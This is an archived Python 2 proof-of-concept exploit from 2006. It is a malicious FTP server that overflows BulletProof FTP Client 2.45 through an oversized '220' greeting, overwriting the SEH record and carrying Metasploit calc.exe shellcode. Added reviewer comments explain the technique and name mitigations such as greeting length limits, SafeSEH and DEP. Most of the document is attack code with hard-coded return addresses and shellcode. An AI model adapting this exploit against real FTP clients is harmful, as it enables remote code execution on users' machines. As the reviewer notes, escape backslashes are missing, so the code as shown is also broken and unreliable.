
# Title : BulletProof FTP Client 2.45 Remote Buffer Overflow Exploit (PoC)
# Published : 2006-10-12
# Author : h07


#!/usr/bin/python
# BulletProof FTP (Client) V2.45 0day Buffer Overflow PoC Exploit
# Vendor URL: http://www.bpftp.com/
# Bug discovered by h07 <h07@interia.pl>
# Shellcode type: Windows Execute Command (calc.exe) thx metasploit.com
# Tested on 2000 SP4 Polish
# Details:
#
# buffer = "220 " + ("A" * 4112) + "rn"
# 41414141  Pointer to next SEH record
# 41414141  SE handler
##
#
# Reviewer notes (defensive reading of what the script below does):
#  - This is the *server* side of the exchange: it listens on TCP/21 and
#    answers the first client that connects with one oversized "220"
#    greeting.  The vulnerable component is the FTP client that parses
#    that greeting, so the exposure is a client talking to a hostile or
#    compromised server, not a listening service.
#  - The greeting is ~4 KB of filler followed by two little-endian DWORDs
#    that land on the SEH record (NEXT_SEH_RECORD / SE_HANDLER below).
#    The handler address is tied to one OS build and locale, as the
#    author's own comment says.  A 220 greeting line several kilobytes
#    long is an easy thing to alert on, and a length bound on the
#    greeting in the client, or the usual SEH-overwrite mitigations on
#    the host (SafeSEH, DEP), defeats this technique.
#  - NOTE(review): the archive copy appears to have lost the backslashes
#    from its string escapes ("rn", "x31xc9...").  As reproduced here the
#    literals are plain text, not the bytes the header describes.
#  - Python 2 syntax throughout (print statement, str-based socket I/O).

from socket import *   # star import: socket(), AF_INET, SOCK_STREAM come from here
from struct import pack
from time import sleep

# Payload bytes as published (author: Metasploit "execute calc.exe").  Kept
# verbatim; see the NOTE(review) above about the missing escape backslashes.
shellcode = (
"x31xc9x83xe9xdbxd9xeexd9x74x24xf4x5bx81x73x13xd8"
"x22x72xe4x83xebxfcxe2xf4x24xcax34xe4xd8x22xf9xa1"
"xe4xa9x0exe1xa0x23x9dx6fx97x3axf9xbbxf8x23x99x07"
"xf6x6bxf9xd0x53x23x9cxd5x18xbbxdex60x18x56x75x25"
"x12x2fx73x26x33xd6x49xb0xfcx26x07x07x53x7dx56xe5"
"x33x44xf9xe8x93xa9x2dxf8xd9xc9xf9xf8x53x23x99x6d"
"x84x06x76x27xe9xe2x16x6fx98x12xf7x24xa0x2dxf9xa4"
"xd4xa9x02xf8x75xa9x1axecx31x29x72xe4xd8xa9x32xd0"
"xddx5ex72xe4xd8xa9x1axd8x87x13x84x84x8exc9x7fx8c"
"x28xa8x76xbbxb0xbax8cx6exd6x75x8dx03x30xccx8dx1b"
"x27x41x13x88xbbx0cx17x9cxbdx22x72xe4")

host = "0.0.0.0"   # listen on every interface; the FTP client must connect to this host
port = 21          # standard FTP control port, so a client's plain "connect" reaches it
# Filler length.  4104 bytes of "A" plus the two 4-byte SEH fields below give
# the 4112 bytes after "220 " that the header's crash description quotes.
LEN = 4104
# Both values are written with pack("<L"), i.e. little-endian 32-bit, directly
# over the SEH record that the filler overruns.
NEXT_SEH_RECORD = 0x909006EB  # JMP SHORT + 0x06
SE_HANDLER = 0x77585A69       # POP POP RET (2000 SP4 Polish) 

# One-shot listener: a single TCP accept(), one greeting, then teardown.
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "n[+] Listening on %d ..." % port

cl, addr = s.accept()   # blocks until a client connects
print "[+] Connection accepted from %s" % addr[0]

# Greeting layout, in order:
#   "220 " | LEN x "A" | next-SEH (4) | SE handler (4) | shellcode | line end
# `buffer` shadows the Python 2 builtin of the same name; harmless here.
buffer = "220 "
buffer += "A" * LEN
buffer += pack("<L", NEXT_SEH_RECORD)
buffer += pack("<L", SE_HANDLER)
buffer += shellcode
buffer += "rn"

cl.send(buffer)   # single send(); the returned byte count is not checked
print "[+] Sending buffer: OKn"

sleep(1)   # let the client read the greeting before the socket goes away
cl.close()
s.close()

# EoF
